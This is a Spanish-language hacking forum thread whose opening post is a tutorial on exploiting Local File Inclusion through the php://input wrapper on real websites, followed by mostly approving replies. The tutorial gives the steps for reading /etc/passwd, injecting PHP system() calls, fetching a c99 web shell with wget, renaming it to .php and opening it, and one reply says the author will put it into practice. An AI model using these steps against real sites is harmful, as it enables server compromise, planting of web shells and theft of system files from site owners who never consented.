This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Subiendo Shell Explotando LFI via PHP:INPUT

  • 10 Replies
  • 9670 Views

0 Members and 1 Guest are viewing this topic.

Offline CalebBucker

  • *
  • Underc0der
  • Posts: 155
  • Actividad:
    0%
  • Reputación 0
  • Te crees Estrella? Avísame para pedirte un Deseo
    • View Profile
    • [In]Seguridad Informatica

Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 14, 2012, 11:53:18 pm

Hola, esta vez les dejare un tutorial, la cual consiste en subir una SHELL explotando la vulnerabilidad LFI via "php:input" , solo basta con inyectar algunos códigos para obtener la misma.

Que es el LFI?

Es una falla en la programacion de una aplicacion; falla mediante la cual se pueden incluir archivos que se encuentren en el servidor como por ejemplo el /etc/passwd o algun otro archivo de configuracion que nos provea de informacion para atacar el sitio.

Ahora bien, empecemos...

Algunos de los sitios webs vulnerables a LFI, tienen este aspecto:

You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login


Ahora bien... para comprobar si realmente el sitio web es vulnerable a LFI, tenemos que ver si la web puede leer el "etc/passwd" cosa que el sitio web quedaría de la siguiente forma:

You are not allowed to view links. Register or Login

Si el sitio web puede leer dicho código, la web quedaría asi:


Como vemos en la imagen, ya comprobamos que el sitio web es vulnerable a LFI.

Ahora, haremos el siguiente paso, para subir una shell al servidor.

Necesitaremos lo siguiente:

Navegador: Firefox
Addon: HackBar


Ahora vamos a tratar de poner este método en acción.

Cargamos la url vulnerable al HackBar e inyectamos el php://input la cual quedaría asi:

You are not allowed to view links. Register or Login

Habilitamos el "Enable Post data" y colocamos el siguiente comando:

<? system('uname -a'); ?>

Ejemplo:


Otros comandos:

Lista de directorios
<? system ('ls'); ?>

Identificación
<? system ('id'); ?>

Convertir el formato
<? system ('mv file.txt file.php'); ?>

Descargar
<? system ('wget'); ?>


Ahora, vamos a utilizar el comando <? system ('wget'); ?> para descargar alguna shell en el sitio.

Utilizaremos esta shell en .txt: You are not allowed to view links. Register or Login

<? system ('wget You are not allowed to view links. Register or Login ?>



Ahora, comprobaremos si la shell se descargo perfectamente, ejecutando el siguiente comando:

<? system ('ls'); ?>

Si la shell, se descargo perfectamente, en este caso lo veremos como c99.txt


Ahora, como ya sabemos que nuestra shell se ejecuto perfectamente, tenemos que cambiarle el formato a .php para poder ingresar a la misma desde el navegador, solo basta con colocar el siguiente comando:

<? system ('mv c99.txt calebbucker.php'); ?>



Ahora, listamos nuevamente los directorios y apreciaremos nuestra shell en .php


Ahora, en este caso nos dirigimos a You are not allowed to view links. Register or Login y Voila tenemos nuestra shell!!


No Entendistes?

Observa el VideoTutorial en 1080p HD!


Espero te sirva y lo uses con prudencia.

Saludos.
« Last Edit: November 23, 2014, 01:20:10 pm by Expermicid »
You are not allowed to view links. Register or Login

Offline arthusu

  • *
  • Ex-Staff
  • *****
  • Posts: 552
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • View Profile
    • Arthusu BLOG

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 15, 2012, 04:44:54 am
Excelente tutorial :)
Pentest - Hacking & Security Services

Contact me: [email protected]

Offline arthusu

  • *
  • Ex-Staff
  • *****
  • Posts: 552
  • Actividad:
    0%
  • Reputación 2
  • Yo solo se que no se nada - Socrátes
    • View Profile
    • Arthusu BLOG

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 15, 2012, 05:32:47 am
Estuve probando con varias paginas vulnerables a lfi pero ninguna de ellas pude hacer el php://input :(
Aunque fueran por post me puse a mirar con el http live headers para ver si se enviaba por post correctamente y si! habia unas paginas que no me tiraban nada, otras que me tiraban un error de file stream open, es decir, que no se podia abrir un archivo en php xD!, tambien cuando no me salia nada me fije en el codigo ctrl+u para ver si estaba algo pero nada, a lo mejor es por que ya solucionaron este bug? bueno igual puede aver alguno igual me sirvio para aprender :D
Pentest - Hacking & Security Services

Contact me: [email protected]

Offline Pr0ph3t

  • *
  • Underc0der
  • Posts: 426
  • Actividad:
    0%
  • Reputación 0
  • © Underc0de Team
    • View Profile

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 15, 2012, 06:54:54 am
Grande Caleb, buen tuto te montaste ;)
Twitter: @The_Pr0ph3t
[email protected]

Offline k0ws

  • *
  • Underc0der
  • Posts: 143
  • Actividad:
    0%
  • Reputación 0
  • I'm Back
    • View Profile

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 15, 2012, 07:22:09 am
Pedazo de tutorial, me encanto  ;D

-Saludos-

Offline Muppet

  • *
  • Ex-Staff
  • *****
  • Posts: 405
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
    • View Profile
    • Email

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: July 15, 2012, 09:46:33 pm
Exelente Aporte!
Entonces él dijo, "cruzad con vuestras tropas y atacad porque es lo único que le queda a nuestro pueblo...".

Offline q3rv0

  • *
  • Underc0der
  • Posts: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • View Profile
    • q3rv0
    • Email

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: August 27, 2012, 08:31:06 pm
Se te olvido decir que para utlizar el wrapper php://input las directivas allow_url_include y allow_url_fopen tienen que estar ON, por consiguiente dicho LFI se convertiria en un RFI, y seria al pedo ejecutar comando de esa manera puediendo incluir directamente una shell a travez de la url.

Buen post igual!  ;) 
Web: You are not allowed to view links. Register or Login

Twitter: You are not allowed to view links. Register or Login

Offline Mr_Pack

  • *
  • Underc0der
  • Posts: 59
  • Actividad:
    0%
  • Reputación 1
    • View Profile
    • r00tc0d3rs
    • Email

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: August 31, 2012, 03:43:58 am
Excelente Aporte  Caleb  ;)

salu2  ;D
____________________________

my best crime is myself

Offline BlackBox

  • *
  • Underc0der
  • Posts: 8
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • Email

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: September 08, 2012, 01:08:30 am
Muy bueno conocia el de Tamper Data injectar en el request la shell..

Te Hago una pregunta muchas veces he encontrado sitios a los cuales les hago esta inyeccion en un campo ejemplo:

download.php?id=/etc/passwd

Si y cuando hago esto me descarga el archivillo con toda la info a mi equipo, me confunde algo este tipo de inyeccion y no sabria si al inyectar la shell en ves de alojarla en el servidor me la descargue al equipo, no he vuelto a encontrar sitios asi como para probar con HackBar

Muchas Gracias por tus Buenos Aportes

Offline droxiscoder

  • *
  • Underc0der
  • Posts: 2
  • Actividad:
    0%
  • Reputación 0
    • View Profile

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: September 09, 2012, 01:20:18 pm
excelente aporte muchas gracias

Offline DogBreaker

  • *
  • Underc0der
  • Posts: 22
  • Actividad:
    0%
  • Reputación 0
  • Skype! Dog.Breaker1
    • View Profile
    • Email

Re:Subiendo Shell Explotando LFI via PHP:INPUT

  • on: November 02, 2012, 11:18:52 am
exelente ya lo voy a llevar a la practica!
El futuro pertenece a quienes creen en la belleza de sus sueños